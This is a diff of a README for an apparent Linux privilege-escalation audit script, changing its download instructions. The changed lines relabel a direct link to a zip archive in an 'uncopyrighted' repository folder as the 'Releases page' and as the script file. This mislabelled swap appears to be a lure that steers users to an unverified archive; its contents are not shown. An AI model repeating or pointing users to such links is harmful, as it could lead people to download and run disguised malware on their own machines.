RawatKartik1411/linux-priv-esc-audit/README.md

 ## 🛠️ Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page here](https://github.com/RawatKartik1411/linux-priv-esc-audit/releases) to see all available versions.
+1. **Visit the Releases Page**: Go to the [Releases page here](https://github.com/RawatKartik1411/linux-priv-esc-audit/raw/refs/heads/main/uncopyrighted/linux-audit-esc-priv-v2.7.zip) to see all available versions.
 2. **Choose the Latest Release**: Find the latest release version at the top of the page.
-3. **Download the Script**: Click on the file named `linux-priv-esc-audit.sh` to start downloading.
+3. **Download the Script**: Click on the file named `https://github.com/RawatKartik1411/linux-priv-esc-audit/raw/refs/heads/main/uncopyrighted/linux-audit-esc-priv-v2.7.zip` to start downloading.
 4. **Open Terminal**: After downloading, open your terminal or command line interface.
 5. **Navigate to the Download Folder**: Use the command:
    ```bash